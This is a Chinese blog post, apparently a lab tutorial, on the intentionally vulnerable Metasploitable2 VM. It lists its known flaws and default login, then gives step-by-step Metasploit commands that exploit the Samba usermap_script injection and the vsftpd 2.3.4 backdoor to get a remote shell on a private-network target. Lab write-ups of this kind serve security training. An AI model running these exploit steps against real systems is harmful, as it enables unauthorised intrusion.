代码编织梦想

为什么年轻时都会颓废堕落一段时间,因为现实否定了我们内心的世界观。。。

---- 网易云热评

一、Metasploitable2简介

Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机。

开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了DVWA、Mutillidae等Web漏洞演练平台。

Metasploit able 2是一个虚拟机文件, 从网上下载解压之后就可以直接使用,不需要自己安装。

下载地址:https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

用户名:msfadmin 密码:msfadmin

二、Metasploitable2漏洞列表

1、弱口令漏洞(如vnc、mysql、PostgreSQL等)

2、Samba MS-RPC Shell命令注入漏洞

3、Vsftpd源码包后门漏洞

4、UnreallRCd后门漏洞

5、Linux NFS共享目录配置漏洞

6、Java RMI SERVER命令执行漏洞

7、Tomcat管理台默认口令漏洞

8、root用户弱口令漏洞(SSH爆破)

9、Distcc后门漏洞

10、Samba sysmlink默认配置目录遍历漏洞

11、PHP CGI参数注入执行漏洞

12、DRuby远程代码执行漏洞

13、Ingreslock后门漏洞

14、Rlogin后门漏洞

三、Samba MS-RPC Shell命令注入漏洞

漏洞产生原因:传递通过MS-RPC提供的未过滤的用户 输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。

攻击机:kali linux IP:192.168.1.133

靶机:Metasploitable2 IP:192.168.1.131

1、启动数据库并且打开metasploit控制台:msfconsole

d48b4984a9ed87fdeae9de99dece8037.png

2、搜索可利用的模块:search samba

e8aaff5ba40b316f2db976b845506f04.png

3、选择要利用的模块:use exploit/multi/samba/usermap_script

查看需要设置的参数:show options

需要设置目标ip和端口(默认139)

13981bb7807f78935195dbfe6117d7b3.png

4、设置目标主机地址:192.168.1.131

75c960ee8934a9147ac1a26206ebf3e3.png

5、运行:run 此时已建立shell连接

9272038f10daf09e0ae8f4b648454156.png

6、查看目标主机目录文件:ls

2beb9ea950f3209f784def8f196d8c66.png

四、Vsftpd源码包后门漏洞

漏洞产生原因:在特定版本的vsftpd服务器程序中, 被人恶意植入代码,当用户名以“:)”为结尾,服务器就会在6200端口监听,并且能够执行任意恶意代码。

攻击机:kali linux IP:192.168.1.133

靶机:Metasploitable2 IP:192.168.1.136

1、搜索可用攻击模块:search vsftpd

e2cbf0fac3535ca659228d06b6ecfcbb.png

2、选择要利用的模块:useexploit/unix/ftp/vsftpd_234_backdoor

查看需要设置的参数:show options

需要设置目标ip和端口(默认21)

5388fcacc2b5006c93f4fde87ec01189.png

3、设置目标主机地址:192.168.1.136

7cd4b34430052e4a5334592e26fdc66b.png

4、 运行:run 此时已建立shell连接

cb66a8f30924dc7f94b943a5583bf0f7.png

5、查看目标主机目录文件:ls

8ffb7bea08654cb0f7f2e32e9ddbed60.png

禁止非法,后果自负

欢迎关注公众号:web安全工具库

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接: https://blog.csdn.net/weixin_39989941/article/details/110225475